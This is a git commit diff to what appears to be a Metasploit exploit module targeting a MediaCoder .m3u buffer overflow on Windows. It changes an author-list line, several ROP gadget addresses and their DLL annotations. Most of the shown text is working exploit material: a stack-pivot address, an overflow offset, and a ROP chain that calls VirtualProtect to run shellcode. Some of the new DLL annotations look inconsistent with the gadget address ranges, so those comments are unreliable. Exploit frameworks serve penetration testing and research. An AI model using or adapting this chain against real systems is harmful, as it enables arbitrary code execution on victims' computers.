add dll references for rop

modpr0be · modpr0be · commit b2a18c37ee72 · 2013-07-09T03:20:05.000+07:00
diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
 			'Author'         =>
 				[
 					'metacom', # Vulnerability discovery and PoC
-					'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
+					'modpr0be <modpr0be[at]spentera.com>', # Metasploit module
 					'otoy <otoy[at]spentera.com>' # Metasploit module
 				],
 			'References'     =>
@@ -50,7 +50,7 @@ def initialize(info = {})
 				[
 					[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1',
 						{
-							'Ret'		=> 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret)
+							'Ret'		=> 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
 							'Offset'	=> 849,
 							'Max'		=> 5000
 						}
@@ -80,33 +80,33 @@ def exploit
 		rop_gadgets =
 		[
 			nops(true,35),	# ROP NOP
-			0x100482ff,	# POP EAX # POP EBP # RETN
+			0x100482ff,	# POP EAX # POP EBP # RETN [jpeg.dll]
 			0xffffffc0,	# negate will become 0x00000040
 			junk,
-			0x66d9d9ba,	# NEG EAX # RETN
-			0x6ab2241d,	# XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN
+			0x66d9d9ba,	# NEG EAX # RETN [avutil-52.dll]
+			0x6ab2241d,	# XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
 			junk(15),  	# reserve more junk for add esp,2c
-			0x1004a8ee,	# POP ECX # RETN
-			0x6ab561b0,	# ptr to &VirtualProtect()
-			0x66d9feee,	# MOV EAX,DWORD PTR DS:[ECX] # RETN
-			0x6ab19780,	# XCHG EAX,ESI # RETN
-			0x66d929f5,	# POP EAX # POP EBX # RETN
+			0x1004cc03,	# POP ECX # RETN [jpeg.dll] 
+			0x6ab561b0,	# ptr to &VirtualProtect() [IAT swscale-2.dll]
+			0x66d9feee,	# MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
+			0x6ab19780,	# XCHG EAX,ESI # RETN [swscale-2.dll]
+			0x66d929f5,	# POP EAX # POP EBX # RETN [jpeg.dll]
 			0xfffffcc0,	# negate will become 0x0000033f
 			junk,
-			0x6ab3c65a,	# NEG EAX # RETN
-			0x1004cc03,	# POP ECX # RETN
+			0x6ab3c65a,	# NEG EAX # RETN [postproc-52.dll]
+			0x1004cc03,	# POP ECX # RETN [jpeg.dll]
 			0xffffffff,	#
-			0x660166e9,	# INC ECX # SUB AL,0EB # RETN
-			0x66d8ae48,	# XCHG ECX,EBX # RETN
-			0x1005f6e4,	# ADD EBX,EAX # OR EAX,3000000 # RETN
-			0x6ab3d688,	# POP ECX # RETN
-			0x6ab4ead0,	# Writable address
-			0x100444e3,	# POP EDI # RETN
-			nops(true),	# ROP NOP
-			0x10048377,	# POP EAX # POP EBP # RETN
+			0x660166e9,	# INC ECX # SUB AL,0EB # RETN [libiconv-2.dll]
+			0x66d8ae48,	# XCHG ECX,EBX # RETN [avutil-52.dll]
+			0x1005f6e4,	# ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
+			0x6ab3d688,	# POP ECX # RETN [jpeg.dll]
+			0x6ab4ead0,	# Writable address [avutil-52.dll] 
+			0x100444e3,	# POP EDI # RETN [swscale-2.dll]
+			nops(true),	# ROP NOP [swscale-2.dll]
+			0x100482ff,	# POP EAX # POP EBP # RETN [jpeg.dll]
 			nops,      	# Regular NOPs
-			0x6ab01c06,	# PUSH ESP# RETN
-			0x6ab28dda,	# PUSHAD # RETN
+			0x6ab01c06,	# PUSH ESP# RETN [swscale-2.dll]
+			0x6ab28dda,	# PUSHAD # RETN [swscale-2.dll]
 		].flatten.pack("V*")
 
 		sploit = "http://"
